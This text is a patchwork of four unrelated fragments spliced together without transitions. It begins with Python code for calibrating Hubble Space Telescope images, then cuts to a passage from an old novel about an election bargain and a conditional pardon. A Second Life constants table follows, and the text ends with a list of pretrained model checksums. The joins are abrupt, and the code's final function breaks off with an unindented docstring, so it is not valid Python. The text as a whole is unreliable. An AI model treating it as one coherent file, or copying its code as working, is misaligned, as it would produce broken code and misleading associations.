        orig_file['DQ'].data |= 4*flat_dq
        orig_file['SCI'].data *= grism_pfl/flat

    if filter == 'G280':
        # Use F200LP flat
        flat_files = {'G280': 'zcv2053ei_pfl.fits'}  # F200LP
        flat_file = flat_files[filter]
        extra_msg = ' / flat: {0}'.format(flat_file)

        flat_im = pyfits.open(os.path.join(os.getenv('jref'), flat_file))
        for ext in [1, 2]:
            flat = flat_im['SCI', ext].data
            flat_dq = (flat < 0.2)

            orig_file['DQ', ext].data |= 4*flat_dq
            orig_file['SCI', ext].data *= 1./flat

    if filter == 'G800L':
        flat_files = {'G800L': 'n6u12592j_pfl.fits'}  # F814W
        flat_file = flat_files[filter]
        extra_msg = ' / flat: {0}'.format(flat_file)

        flat_im = pyfits.open(os.path.join(os.getenv('jref'), flat_file))
        pfl_file = orig_file[0].header['PFLTFILE'].replace('jref$',
                                                           os.getenv('jref'))
        pfl_im = pyfits.open(pfl_file)
        for ext in [1, 2]:
            flat = flat_im['SCI', ext].data
            flat_dq = (flat < 0.2)
            grism_pfl = pfl_im['SCI', ext].data

            orig_file['DQ', ext].data |= 4*flat_dq
            orig_file['SCI', ext].data *= grism_pfl/flat

        if orig_file[0].header['NPOLFILE'] == 'N/A':
            # Use an F814W file, but this should be updated
            orig_file[0].header['NPOLFILE'] = 'jref$v971826jj_npl.fits'

    if head['INSTRUME'] == 'WFPC2':
        head['DETECTOR'] = 'WFPC2'

    if (head['INSTRUME'] == 'WFC3') and (head['DETECTOR'] == 'IR') and extra_badpix:
        bp = pyfits.open(os.path.join(os.getenv('iref'),
                                      'badpix_spars200_Nov9.fits'))

        if orig_file['DQ'].data.shape == bp[0].data.shape:
            orig_file['DQ'].data |= bp[0].data
            extra_msg += ' / bpix: $iref/badpix_spars200_Nov9.fits'

    if crclean:
        import lacosmicx
        for ext in [1, 2]:
            print('Clean CRs with LACosmic, extension {0:d}'.format(ext))

            sci = orig_file['SCI', ext].data
            dq = orig_file['DQ', ext].data

            crmask, _ = lacosmicx.lacosmicx(sci, inmask=None,
                    sigclip=4.5, sigfrac=0.3, objlim=5.0, gain=1.0,
                    readnoise=6.5, satlevel=65536.0, pssl=0.0, niter=4,
                    sepmed=True, cleantype='meanmask', fsmode='median',
                    psfmodel='gauss', psffwhm=2.5, psfsize=7, psfk=None,
                    psfbeta=4.765, verbose=False)

            dq[crmask] |= 1024
            sci[crmask] = 0

    if verbose:
        print('{0} -> {1} {2}'.format(orig_file.filename(), local_file, extra_msg))

    # WFPC2
    if '_c0' in file:
        # Point "waivered" GEIS reference filenames to their FITS equivalents
        for key in ['MASKFILE', 'ATODFILE', 'BLEVFILE', 'BLEVDFIL', 'BIASFILE', 'BIASDFIL', 'DARKFILE', 'DARKDFIL', 'FLATFILE', 'FLATDFIL', 'SHADFILE']:
            ref_file = '_'.join(head[key].split('.'))+'.fits'
            orig_file[0].header[key] = ref_file.replace('h.fits', 'f.fits')

        waiv = orig_file[0].header['FLATFILE']
        orig_file[0].header['FLATFILE'] = waiv.replace('.fits', '_c0h.fits')
        # (removed dead code: `if not os.path.exists(''): pass` was a no-op)

        # Make sure the extensions have the expected BUNIT keyword
        for ext in range(4):
            if 'BUNIT' not in orig_file[ext+1].header:
                orig_file[ext+1].header['BUNIT'] = 'COUNTS'

        # Copy WFPC2 DQ file (c1m)
        dqfile = os.path.join(path, file.replace('_c0', '_c1'))
        print('Copy WFPC2 DQ file: {0}'.format(dqfile))
        if os.path.exists(os.path.basename(dqfile)):
            os.remove(os.path.basename(dqfile))

        shutil.copy(dqfile, './')

        # Add additional masking since AstroDrizzle having trouble with flats
        flat_file = orig_file[0].header['FLATFILE'].replace('uref$', os.getenv('uref')+'/')
        pfl = pyfits.open(flat_file)
        c1m = pyfits.open(os.path.basename(dqfile), mode='update')
        for ext in [1, 2, 3, 4]:
            mask = pfl[ext].data > 1.3
            c1m[ext].data[mask] |= 2

        c1m.flush()

    orig_file.writeto(local_file, overwrite=True)

    if mask_regions:
        apply_region_mask(local_file, dq_value=1024)
def apply_persistence_mask(flt_file, path='../Persistence', dq_value=1024,
                           err_threshold=0.6, grow_mask=3, subtract=True,
                           verbose=True):
    """Make a mask for pixels flagged as being affected by persistence

    Persistence products can be downloaded from
    https://archive.stsci.edu/prepds/persist/search.php, specifically the
    "_persist.fits" files.

    Parameters
    ----------
    flt_file : str
        Filename of the WFC3/IR FLT exposure

    path : str
        Path to look for the "persist.fits" file.

    dq_value : int
        DQ bit to flip for flagged pixels

    err_threshold : float
        Threshold for defining affected pixels:

            flagged = persist > err_threshold*ERR

    grow_mask : int
        Factor by which to dilate the persistence mask.

    subtract : bool
        Subtract the persistence model itself from the SCI extension.

    verbose : bool
        Print information to the terminal

    Returns
    -------
    Nothing, updates the DQ extension of `flt_file`.
    """
    import scipy.ndimage as nd

    flt = pyfits.open(flt_file, mode='update')

    pers_file = os.path.join(path,
            os.path.basename(flt_file).replace('_flt.fits', '_persist.fits'))

    if not os.path.exists(pers_file):
        if verbose:
            print('Persistence file {0} not found'.format(pers_file))

        # BUGFIX: this early return was commented out, so a missing
        # persistence file crashed the pyfits.open call just below.
        return 0

    pers = pyfits.open(pers_file)

    # Pixels where the persistence model is significant relative to the noise
    pers_mask = pers['SCI'].data > err_threshold*flt['ERR'].data

    if grow_mask > 0:
        # Dilate the mask; *1 casts bool -> int for the filter
        pers_mask = nd.maximum_filter(pers_mask*1, size=grow_mask)
    else:
        pers_mask = pers_mask * 1

    NPERS = pers_mask.sum()
    if verbose:
        print('{0}: flagged {1:d} pixels affected by persistence (pers/err={2:.2f})'.format(pers_file, NPERS, err_threshold))

    if NPERS > 0:
        flt['DQ'].data[pers_mask > 0] |= dq_value
        if subtract:
            # Don't subtract twice if the header says it was already done
            dont_subtract = False
            if 'SUBPERS' in flt[0].header:
                if flt[0].header['SUBPERS']:
                    dont_subtract = True

            if not dont_subtract:
                flt['SCI'].data -= pers['SCI'].data
                # Propagate the model into the error in quadrature
                flt['ERR'].data = np.sqrt(flt['ERR'].data**2+pers['SCI'].data**2)
                flt[0].header['SUBPERS'] = (True, 'Persistence model subtracted')

    flt.flush()
def apply_region_mask(flt_file, dq_value=1024, verbose=True):
    """Apply DQ mask from a DS9 region file

    Searches for region files with filenames like
    `flt_file.replace('_flt.fits','.[ext].mask.reg')`, where `[ext]` is an
    integer referring to the SCI extension in the FLT file.

    Parameters
    ----------
    flt_file : str
        Filename of the FLT exposure

    dq_value : int
        DQ bit to flip for affected pixels

    verbose : bool
        Print the list of region files that were found.

    Returns
    -------
    True, whether or not any mask files were found and applied.
    """
    import pyregion

    mask_files = glob.glob(flt_file.replace('_flt.fits', '.*.mask.reg').replace('_flc.fits', '.*.mask.reg').replace('_c0m.fits', '.*.mask.reg').replace('_c0f.fits', '.*.mask.reg'))
    if len(mask_files) == 0:
        return True

    if verbose:
        print('Region mask for {0}: {1}'.format(flt_file, mask_files))

    flt = pyfits.open(flt_file, mode='update')
    for mask_file in mask_files:
        # Extension number is encoded in the filename: root.[ext].mask.reg
        ext = int(mask_file.split('.')[-3])
        try:
            reg = pyregion.open(mask_file).as_imagecoord(flt['SCI', ext].header)
            mask = reg.get_mask(hdu=flt['SCI', ext])
        except Exception:
            # BUGFIX: narrowed from a bare `except:` that also swallowed
            # KeyboardInterrupt/SystemExit.
            # Above fails for lookup-table distortion (ACS / UVIS)
            # Here just assume the region file is defined in image coords
            reg = pyregion.open(mask_file)
            mask = reg.get_mask(shape=flt['SCI', ext].data.shape)

        flt['DQ', ext].data[mask] |= dq_value

    flt.flush()
    return True
def apply_saturated_mask(flt_file, dq_value=1024):
"""Saturated WFC3/IR pixels have some pulldown in the opposite amplifier
Parameters
----------
flt_file : str
Filename of the FLT exposure
dq_value : int
DQ bit to flip for | |
progress and that neither party to it was inclined to give in
a single point.
Of course, he decided, the subject was the coming election campaign, but
the details of desired bargaining he could not gather.
Moreover, often, just as he almost heard sentences of interest, the
chatter of the girls or some remark of Mrs. Wheeler’s would drown the
voices of the men in the room.
One time, indeed, he heard clearly: “When the Sycamore on the ridge goes
into Massachusetts——” but this was sheer nonsense, and he concluded he
must have misunderstood.
Later, they all forgathered in the living-room and there was music and
general conversation.
<NAME> proved herself decidedly entertaining, and though Samuel
Appleby looked a little amusedly at his stenographer, he smiled kindly at
her as he noticed that she in no way overstepped the bounds of correct
demeanor.
Genevieve was thinking of what Keefe had said to her: “If you do only
what is absolutely correct and say what is only absolutely correct, you
can do whatever you like.”
She had called it nonsense at the time, but she was beginning to see the
truth of it. She was careful that her every word and act should be
correct, and she was most decidedly doing as she liked. She made good
with Mrs. Wheeler and Maida with no trouble at all; but she felt,
vaguely, that Mr. Wheeler didn’t like her. This she set about to remedy.
Going to his side, as he chanced to sit for a moment alone, she smiled
ingratiatingly and said:
“I wonder if you can imagine, sir, what it means to me to see the inside
of a house like this?”
“Bless my soul, what do you mean?” asked Wheeler, puzzled at the girl’s
manner.
“It’s like a glimpse of Fairyland,” she went on. “You see, I’m terribly
ambitious—oh, fearfully so! And all my ambitions lead to just this sort
of a home. Do you suppose I’ll ever achieve it, Mr. Wheeler?”
Now the girl had truly wonderful magnetic charm, and even staid old Dan
Wheeler was not insensible to the note of longing in her voice, the
simple, honest admission of her hopes.
“Of course you will, little one,” he returned, kindly. “I’ve heard that
whatever one wants, one gets, provided the wish is strong enough.” He
spoke directly to her, but his gaze wandered as if his thoughts were far
away.
“Do you really believe that?” Genevieve’s big blue eyes begged an
affirmation.
“I didn’t say I believed it—I said I have heard it.” He smiled sadly.
“Not quite the same—so far as I’m concerned; but quite as assuring to
you. Of course, my belief wouldn’t endorse the possibility.”
“It would for me,” declared Genevieve. “I’ve lots of confidence in other
people’s opinions——”
“Anybody’s?”
“Anybody whom I respect and believe in.”
“Appleby, for instance?”
“Oh, yes, indeed! I’d trust Mr. Appleby’s opinions on any subject. Let’s
go over there and tell him so.”
<NAME> was sitting at the other end, the north end of the long
room. “No,” said Wheeler, “I’m too comfortable here to move—ask him to
come here.”
Genevieve looked at him a little astonished. It was out of order, she
thought, for a host to speak thus. She pressed the point, saying there
was a picture at the other end of the room she wished to examine.
“Run along, then,” said Wheeler, coolly. “Here, Maida, show <NAME>
that etching and tell her the interesting details about it.”
The girls went away, and soon after Keefe drifted round to Wheeler’s
side.
“You know young <NAME>?” he asked, casually.
“No,” Wheeler said, shortly but not sharply. “I daresay he’s a most
estimable chap.”
“He’s all of that. He’s a true chip of the old block. Both good
gubernatorial timber, as I’m sure you agree.”
“What makes you so sure, Mr. Keefe?”
<NAME> looked straight at him. “Well,” he laughed, “I’m quite ready
to admit that the wish was father to the thought.”
“Why do you call that an admission?”
“Oh,” Keefe readily returned, “it is usually looked upon as a confession
that one has no reason for a thought other than a wish.”
“And why is it your wish?”
“Because it is the wish of my employer,” said Keefe, seriously. “I know
of no reason, <NAME>, why I shouldn’t say that I hope and trust you
will use your influence to further the cause of young Appleby.”
“What makes you think I can do so?”
“While I am not entirely in <NAME>’s confidence, he has told me that
the campaign would be greatly aided by your willingness to help, and so I
can’t help hoping you will exercise it.”
“Appleby has told you so much, has he? No more?”
“No more, I think, regarding yourself, sir. I know, naturally, the
details of the campaign so far as it is yet mapped out.”
“And you know why I do not want to lend my aid?”
“I know you are not in accordance with the principles of the Appleby
politics——”
“That I am not! Nor shall I ever be. Nor shall I ever pretend to be——”
“Pretend? Of course not. But could you not be persuaded?”
“By what means?”
“I don’t know, <NAME>,” and Keefe looked at him frankly. “I truly
don’t know by what means. But I do know that Mr. Appleby is here to
present to you an argument by which he hopes to persuade you to help
young Sam along—and I earnestly desire to add any word of mine that may
help influence your decision. That is why I want to tell you of the good
traits of <NAME>, junior. It may be I can give you a clearer light
on his character than his father could do——that is, I might present it as
the opinion of a friend——”
“And not exaggerate his virtues as a father might do? I see. Well, Mr.
Keefe, I appreciate your attitude, but let me tell you this: whatever I
do or don’t do regarding this coming campaign of young Appleby will be
entirely irrespective of the character or personality of that young man.
It will all depend on the senior Appleby’s arrangements with me, and my
ability to change his views on some of the more important planks in his
platform. If he directed you to speak to me as you have done, you may
return that to him as my answer.”
“You, doubtless, said the same to him, sir?”
“Of course I did. I make no secret of my position in this matter. <NAME> has a hold over me—I admit that—but it is not strong enough to
make me forget my ideas of right and wrong to the public. No influence of
a personal nature should weigh against any man’s duty to the state, and I
will never agree to pretend to any dissimulation in order to bring about
a happier life for myself.”
“But need you subscribe to the objectionable points to use your influence
for young Sam?”
“Tacitly, of course. And I do not choose even to appear to agree to
principles abhorrent to my sense of justice and honesty, thereby secretly
gaining something for myself.”
“Meaning your full pardon?”
Wheeler turned a look of surprise on the speaker.
“I thought you said you hadn’t Appleby’s full confidence,” he said.
“Nor have I. I do know—as do many men—that you were pardoned with a
condition, but the condition I do not know. It can’t be very galling.”
And Keefe looked about on the pleasant surroundings.
“You think not? That’s because you don’t know the terms. And yet, galling
though they are, hateful though it makes my life, and the lives of my
wife and daughter, we would all rather bear it than to deviate one iota
from the path of strict right.”
“I must admire you for that, as must any honorable man. But are there not
degrees or shadings of right and wrong——”
“Mr. Keefe, as an old man, I take the privilege of advising you for your
own good. All through your life I beg you remember this: Anyone who
admits degrees or shadings of right or wrong—is already wrong. Don’t be
offended; you didn’t claim those things, you merely asked the question.
But, remember what I said about it.”
CHAPTER III
ONE LAST ARGUMENT
Adjoining the bedroom of <NAME> at Sycamore Ridge was a small
sitting-room, also at his disposal. Here, later that same evening he sat
in confab | |
<reponame>FelixWolf/pyverse<gh_stars>1-10
class constraints:
constraints = {
#http://wiki.secondlife.com/wiki/SimStats
#Ratio of time passage in region to real time passage.
"LL_SIM_STAT_TIME_DILATION": 0,
#Number of timesteps taken per second, rolling scale. Perfect is 45.0
"LL_SIM_STAT_FPS": 1,
#Number of timesteps taken in the physics engine per second, rolling scale. Perfect is 45.0
"LL_SIM_STAT_PHYSFPS": 2,
#Number of updates sent for agent objects per second. Should be one for every main agent and child agent connected to the region.
"LL_SIM_STAT_AGENTUPS": 3,
#Number of milliseconds spent processing each frame(Sum of all others). Averaged over each second. Should ideally be below 25.0
"LL_SIM_STAT_FRAMEMS": 4,
#Number of milliseconds spent processing network messages or connections. Averaged over each second. Should ideally be below 5.0
"LL_SIM_STAT_NETMS": 5,
#Number of milliseconds spent doing "other" things. Averaged over each second. Should ideally be below 5.0
"LL_SIM_STAT_SIMOTHERMS": 6,
#Number of milliseconds spent inside the physics engine(Sum of physics times.) Averaged over each second. Should ideally be below 10.0
"LL_SIM_STAT_SIMPHYSICSMS": 7,
#Number of milliseconds spent calculating agent visibility, interest lists, status, and preparing physical entity. Averaged over each second. Should ideally be below 5.0
"LL_SIM_STAT_AGENTMS": 8,
#Number of milliseconds spent processing image data, separating discard levels, decoding images. Averaged over each second. Should ideally be below 3.0
"LL_SIM_STAT_IMAGESMS": 9,
#Number of milliseconds spent running scripts and updating script states. Averaged over each second. Should ideally be below 25.0
"LL_SIM_STAT_SCRIPTMS": 10,
#Number of prims(tasks) within the region, including temporary tasks.
"LL_SIM_STAT_NUMTASKS": 11,
#Number of prims(tasks) that are active(physical, have scripts, changing status, being stood on.)
"LL_SIM_STAT_NUMTASKSACTIVE": 12,
#Number of agents that are within the region
"LL_SIM_STAT_NUMAGENTMAIN": 13,
#Number of agents that are not located within the region but can see into it.(Looking into the region from another region.)
"LL_SIM_STAT_NUMAGENTCHILD": 14,
#Number of scripts that are loaded onto tasks and set to running within the region. Scripts no set to running do not count towards this value.
"LL_SIM_STAT_NUMSCRIPTSACTIVE": 15,
#Number of LSL virtual machine instructions executed within the last second.
"LL_SIM_STAT_LSLIPS": 16,
#Number of packets simulator received that were related to the region in the last second.
"LL_SIM_STAT_INPPS": 17,
#Number of packets sent by the region in the last second.
"LL_SIM_STAT_OUTPPS": 18,
#Number of asset download requests waiting for a response.
"LL_SIM_STAT_PENDING_DOWNLOADS": 19,
#Number of asset upload requests waiting for authorization, response or to complete transfer.
"LL_SIM_STAT_PENDING_UPLOADS": 20,
#Unknown. Number of locally stored assets trying to transfer to another sim?(Skin bakes.)
"LL_SIM_STAT_PENDING_LOCAL_UPLOADS": 23,
#Number of kilobytes of network messages that have yet to be acknowledged. Ideally below 1000.
"LL_SIM_STAT_TOTAL_UNACKED_BYTES": 24,
#Number of prims that are marked as pinned within the physics system. Usually 0.
"LL_SIM_STAT_PHYSICS_PINNED_TASKS": 25,
#Number of prims that have had their level of detail reduced to help alleviate physics load. Ideally 0.
"LL_SIM_STAT_PHYSICS_LOD_TASKS": 26,
#Number of milliseconds spent running the physics time step. Averaged over a second. Ideally should be below 15.0
"LL_SIM_STAT_SIMPHYSICSSTEPMS": 27,
#Number of milliseconds spent updating the physical shape of an object. Averaged over a second. Ideally should be below 3.0
"LL_SIM_STAT_SIMPHYSICSSHAPEMS": 28,
#Number of milliseconds spent inside the physics engine not updating shapes or running physics step. Averaged over a second. Ideally should be below 3.0
"LL_SIM_STAT_SIMPHYSICSOTHERMS": 29,
#Number of megabytes of RAM allocated on the simulator for physics.
"LL_SIM_STAT_SIMPHYSICSMEMORY": 30,
#Damage system forced to on for entire region.
"REGION_FLAGS_ALLOW_DAMAGE": 0x01,
#If agents can create landmarks anywhere within the region.(Forced on)
"REGION_FLAGS_ALLOW_LANDMARK": 0x02,
#If agents can set their home location to anywhere within the region.(Forced on)
"REGION_FLAGS_ALLOW_SET_HOME": 0x04,
#If agents home location is set to the destination upon teleporting out of the region.
"REGION_FLAGS_RESET_HOME_ON_TELEPORT": 0x08,
#If the sun should not move with time.
"REGION_FLAGS_SUN_FIXED": 0x10,
#If taxes should not apply to this region.(Deprecated)
"REGION_FLAGS_TAX_FREE": 0x20,
#Land cannot be changed anywhere within the region. Trees and plants may still be placed.
"REGION_FLAGS_BLOCK_TERRAFORM": 0x40,
#Land cannot be released, sold, or bought within the entire region.
"REGION_FLAGS_BLOCK_LAND_RESELL": 0x80,
#Region is a sandbox and is wiped every 12 hours.(Appears deprecated.)
"REGION_FLAGS_SANDBOX": 0x100,
#Unknown: Related to the availability of an overview world map tile.(Think mainland images when zoomed out.)
"REGION_FLAGS_NULL_LAYER": 0x200,
#Unknown: Related to region debug flags. Possibly to skip processing of agent interaction with world.
"REGION_FLAGS_SKIP_AGENT_ACTION": 0x400,
#Region does not update agent prim interest lists. Internal debugging option.
"REGION_FLAGS_SKIP_UPDATE_INTEREST_LIST": 0x800,
#Makes all objects phantom and or pins them in place, does not affect agents.
"REGION_FLAGS_SKIP_COLLISIONS": 0x1000,
#Region does not run scripts, affects whole region.
"REGION_FLAGS_SKIP_SCRIPTS": 0x2000,
#Region does not run physics timesteps. All objects are frozen, including agents.
"REGION_FLAGS_SKIP_PHYSICS": 0x4000,
#Region can be seen from other regions on world map. (Legacy world map option?)
"REGION_FLAGS_EXTERNALLY_VISIBLE": 0x8000,
#Region can be seen from mainland on world map. (Legacy world map option?)
"REGION_FLAGS_MAINLAND_VISIBLE": 0x10000,
#Agents not explicitly on the access list can visit the region.
"REGION_FLAGS_PUBLIC_ALLOWED": 0x20000,
#Traffic calculations are not run across entire region, overrides parcel settings.
"REGION_FLAGS_BLOCK_DWELL": 0x40000,
#Flight is disabled for the entire region, overrides parcel settings.
"REGION_FLAGS_BLOCK_FLY": 0x80000,
#If teleports are allowed to exactly locations, if not on, agent is routed to nearest telehub. Overrides parcel settings.
"REGION_FLAGS_ALLOW_DIRECT_TELEPORT": 0x100000,
#Region is not running scripts, persisted in database. Set on an estate level.
"REGION_FLAGS_ESTATE_SKIP_SCRIPTS": 0x200000,
#Restricts the usage of the LSL llPushObject function, applies to whole region.
"REGION_FLAGS_RESTRICT_PUSHOBJECT": 0x400000,
#Denys "hackers on steroids" with no payment info from entering the region.
"REGION_FLAGS_DENY_ANONYMOUS": 0x800000,
#Denys agents with payment info from entering the region.(Legacy removed option.)
"REGION_FLAGS_DENY_IDENTIFIED": 0x1000000,
#Denys agents with payment info that has been used from entering the region.(Legacy removed option.)
"REGION_FLAGS_DENY_TRANSACTED": 0x2000000,
#Parcels within the region may be joined or divided by anyone, not just estate owners/managers.
"REGION_FLAGS_ALLOW_PARCEL_CHANGES": 0x4000000,
#Abuse reports sent from within this region are sent to the estate owner defined email.
"REGION_FLAGS_ABUSE_EMAIL_TO_ESTATE_OWNER": 0x8000000,
#Voice can be enabled within the region.
"REGION_FLAGS_ALLOW_VOICE": 0x10000000,
#Removes the ability from parcel owners to set their parcels to show in search.
"REGION_FLAGS_BLOCK_PARCEL_SEARCH": 0x20000000,
#Denys agents who have not been age verified from entering the region.
"REGION_FLAGS_DENY_AGEUNVERIFIED": 0x40000000,
#OpenMetaverse/AgentManager.cs
#Placeholder for empty values, shouldn't ever see this
"PERMISSION_NONE": 0,
#Script wants ability to take money from you
"PERMISSION_DEBIT": 1,
#Script wants to take camera controls for you
"PERMISSION_TAKECONTROLS": 2,
#Script wants to remap avatars controls
"PERMISSION_REMAPCONTROLS": 4,
#Script wants to trigger avatar animations
"PERMISSION_TRIGGERANIMATION": 8,
#Script wants to attach or detach the prim or primset to your avatar
"PERMISSION_ATTACH": 16,
#Script wants permission to release ownership
"PERMISSION_RELEASEOWNERSHIP": 32,
#Script wants ability to link/delink with other prims
"PERMISSION_CHANGELINKS": 64,
#Script wants permission to change joints
"PERMISSION_CHANGEJOINTS": 128,
#Script wants permissions to change permissions
"PERMISSION_CHANGEPERMISSIONS": 256,
#Script wants to track avatars camera position and rotation
"PERMISSION_TRACKCAMERA": 512,
#Script wants to control your camera
"PERMISSION_CONTROLCAMERA": 1024,
#Script wants the ability to teleport you
"PERMISSION_TELEPORT": 4096,
#Indicates a regular IM from another agent
"IM_MESSAGEFROMAGENT": 0,
#Simple notification box with an OK button
"IM_MESSAGEBOX": 1,
#Used to show a countdown notification with an OK button, deprecated now
"IM_MESSAGEBOXCOUNTDOWN": 2,
#You've been invited to join a group.
"IM_GROUPINVITATION": 3,
#Inventory offer
"IM_INVENTORYOFFERED": 4,
#Accepted inventory offer
"IM_INVENTORYACCEPTED": 5,
#Declined inventory offer
"IM_INVENTORYDECLINED": 6,
#Group vote
"IM_GROUPVOTE": 7,
#A message to everyone in the agent's group, no longer used
"IM_DEPRECATEDGROUPMESSAGE": 8,
#An object is offering its inventory
"IM_TASKINVENTORYOFFERED": 9,
#Accept an inventory offer from an object
"IM_TASKINVENTORYACCEPTED": 10,
#Decline an inventory offer from an object
"IM_TASKINVENTORYDECLINED": 11,
#Unknown
"IM_NEWUSERDEFAULT": 12,
#Start a session, or add users to a session
"IM_SESSIONADD": 13,
#Start a session, but don't prune offline users
"IM_SESSIONOFFLINEADD": 14,
#Start a session with your group
"IM_SESSIONGROUPSTART": 15,
#Start a session without a calling card (finder or objects)
"IM_SESSIONCARDLESSSTART": 16,
#Send a message to a session
"IM_SESSIONSEND": 17,
#Leave a session
"IM_SESSIONDROP": 18,
#Indicates that the IM is from an object
"IM_MESSAGEFROMOBJECT": 19,
#Sent an IM to a busy user, this is the auto response
"IM_BUSYAUTORESPONSE": 20,
#Shows the message in the console
'v0.0.524'),
('resnetd50b', '0550', '7ba88f0436b3fa598520424bb463ac985ffb0caf', 'v0.0.296'),
('resnetd101b', '0460', 'b90f971e4514345fb885de95165ddcc4e6610234', 'v0.0.296'),
('resnetd152b', '0470', '41442334cde93c9744d2a86288d11614c848503a', 'v0.0.296'),
('nin_cifar10', '0743', '045abfde63c6b73fbb1b6c6b062c9da5e2485750', 'v0.0.175'),
('nin_cifar100', '2839', '891047637c63f274d4138a430fcaf5f92f054ad4', 'v0.0.183'),
('nin_svhn', '0376', '2fbe48d0dd165c97acb93cf0edcf4b847651e3a0', 'v0.0.270'),
('resnet20_cifar10', '0597', '15145d2e00c85b5c295b6999068ce4b494febfb0', 'v0.0.163'),
('resnet20_cifar100', '2964', '6a85f07e9bda4721ee68f9b7350250b866247324', 'v0.0.180'),
('resnet20_svhn', '0343', 'b6c1dc9982e1ee04f089ca02d5a3dbe549b18c02', 'v0.0.265'),
('resnet56_cifar10', '0452', 'eb7923aa7d53e4e9951483b05c9629010fbd75a4', 'v0.0.163'),
('resnet56_cifar100', '2488', '2d641cdef73a9cdc440d7ebfb665167907a6b3bd', 'v0.0.181'),
('resnet56_svhn', '0275', 'cf18a0720e4e73e5d36832e24a36b78351f9c266', 'v0.0.265'),
('resnet110_cifar10', '0369', '27d76fce060ce5737314f491211734bd10c60308', 'v0.0.163'),
('resnet110_cifar100', '2280', 'd2ec4ff1c85095343031a0b11a671c4799ae1187', 'v0.0.190'),
('resnet110_svhn', '0245', 'f274056a4f3b187618ab826aa6e3ade028a3a4da', 'v0.0.265'),
('resnet164bn_cifar10', '0368', 'd86593667f30bfef0c0ad237f2da32601b048312', 'v0.0.179'),
('resnet164bn_cifar100', '2044', '190ab6b485404e43c41a85542e57adb051744aa0', 'v0.0.182'),
('resnet164bn_svhn', '0242', 'b4c1c66ccc47f0802058fcd469844811f214bbca', 'v0.0.267'),
('resnet272bn_cifar10', '0333', 'b7c6902a5e742b2c46c9454be5962f9a5e5a0fa5', 'v0.0.368'),
('resnet272bn_cifar100', '2007', 'fe6b27f8b18785d568719dfbaea79ae05eb0aefe', 'v0.0.368'),
('resnet272bn_svhn', '0243', '693d5c393d2823146a1bdde0f8b11bb21ccd8c12', 'v0.0.368'),
('resnet542bn_cifar10', '0343', 'b6598e7a0e5bd800b4425424b43274a96677e77b', 'v0.0.369'),
('resnet542bn_cifar100', '1932', '4f95b380a755ae548187bfa0da038565c50e1e26', 'v0.0.369'),
('resnet542bn_svhn', '0234', '7421964d2246a7b5ba7f9baf294cc3bd06329ad8', 'v0.0.369'),
('resnet1001_cifar10', '0328', '0e27556cdc97b7d0612d4518546a9b0479e030c3', 'v0.0.201'),
('resnet1001_cifar100', '1979', '6416c8d2f86debf42f1a3798e4b53fa8d94b0347', 'v0.0.254'),
('resnet1001_svhn', '0241', 'c8b23d4c50359cac2fbd837ed754cc4ea7b3b060', 'v0.0.408'),
('resnet1202_cifar10', '0353', 'd82bb4359d16e68989547f8b1153c8f23264e46c', 'v0.0.214'),
('resnet1202_cifar100', '2156', '711136021e134b4180cc49c7bb1dda2bd0d4ab49', 'v0.0.410'),
('preresnet20_cifar10', '0651', '5cf94722c7969e136e2174959fee4d7b95528f54', 'v0.0.164'),
('preresnet20_cifar100', '3022', 'e3fd9391a621da1afd77f1c09ae0c9bdda4e17aa', 'v0.0.187'),
('preresnet20_svhn', '0322', '8e56898f75a9ba2c016b1e14e880305e55a96ea7', 'v0.0.269'),
('preresnet56_cifar10', '0449', '73ea193a6f184d034a4b5b911fe6d23473eb0220', 'v0.0.164'),
('preresnet56_cifar100', '2505', 'f879fb4e9c9bc328b97ca8999575ea29343bbd79', 'v0.0.188'),
('preresnet56_svhn', '0280', 'f512407305efa862c899a56cfc86003ee9ca0e9f', 'v0.0.269'),
('preresnet110_cifar10', '0386', '544ed0f0e0b3c0da72395924e2ea381dbf381e52', 'v0.0.164'),
('preresnet110_cifar100', '2267', '4e010af04fefb74f6535a1de150f695460ec0550', 'v0.0.191'),
('preresnet110_svhn', '0279', '8dcd3ae54540a62f6a9b87332f0aa2abfc587600', 'v0.0.269'),
('preresnet164bn_cifar10', '0364', 'c0ff243801f078c6e6be72e1d3b67d88d61c4454', 'v0.0.196'),
('preresnet164bn_cifar100', '2018', '5228dfbdebf0f4699dae38a4a9b8310b08189d48', 'v0.0.192'),
('preresnet164bn_svhn', '0258', '69de71f53eee796710e11dae53f10ed276588df0', 'v0.0.269'),
('preresnet272bn_cifar10', '0325', '8f8f375dfca98fb0572b2de63ca3441888c52a88', 'v0.0.389'),
('preresnet272bn_cifar100', '1963', '52a0ebabfa75366e249e612b9556c87618acf41e', 'v0.0.389'),
('preresnet272bn_svhn', '0234', 'b2cc8842932feb8f04547d5341f00ef2a3846d8a', 'v0.0.389'),
('preresnet542bn_cifar10', '0314', '86a2b5f51c4e8064ba3093472a65e52e4d65f6be', 'v0.0.391'),
('preresnet542bn_cifar100', '1871', 'd7343a662a78d29fe14f98e7dba6d79096f43904', 'v0.0.391'),
('preresnet542bn_svhn', '0236', '67f372d8a906e75f2aa3a32396e757851fd6e1fd', 'v0.0.391'),
('preresnet1001_cifar10', '0265', '1f3028bdf7143b8f99340b1b1a0a8e029d7020a0', 'v0.0.209'),
('preresnet1001_cifar100', '1841', 'fcbddbdb462da0d77c50026878ea2cfb6a95f5d4', 'v0.0.283'),
('preresnet1202_cifar10', '0339', 'cc2bd85a97842f7a444deb78262886a264a42c25', 'v0.0.246'),
('resnext29_32x4d_cifar10', '0315', '442eca6c30448563f931174d37796c2f08c778b7', 'v0.0.169'),
('resnext29_32x4d_cifar100', '1950', 'de139852f2876a04c74c271d50f0a50ba75ece3e', 'v0.0.200'),
('resnext29_32x4d_svhn', '0280', '0a402faba812ae0b1238a6da95adc734a5a24f16', 'v0.0.275'),
('resnext29_16x64d_cifar10', '0241', 'e80d3cb5f8d32be2025fe8fb7a7369b2d004217e', 'v0.0.176'),
('resnext29_16x64d_cifar100', '1693', '762f79b3506528f817882c3a47252c2f42e9376b', 'v0.0.322'),
('resnext29_16x64d_svhn', '0268', '04ffa5396ae4a61e60a30f86cd5180611ce94772', 'v0.0.358'),
('resnext272_1x64d_cifar10', '0255', '1ca6630049e54d9d17887c0af26ab6f848d30067', 'v0.0.372'),
('resnext272_1x64d_cifar100', '1911', '9a9b397c1091c6bd5b0f4b13fb6567a99d7aa7ac', 'v0.0.372'),
('resnext272_1x64d_svhn', '0235', 'b12f9d9ce073c72c2e5509a27a5dd065a7b5d05f', 'v0.0.372'),
('resnext272_2x32d_cifar10', '0274', '94e492a4391e589e6722a91ddc8b18df4dc89ed0', 'v0.0.375'),
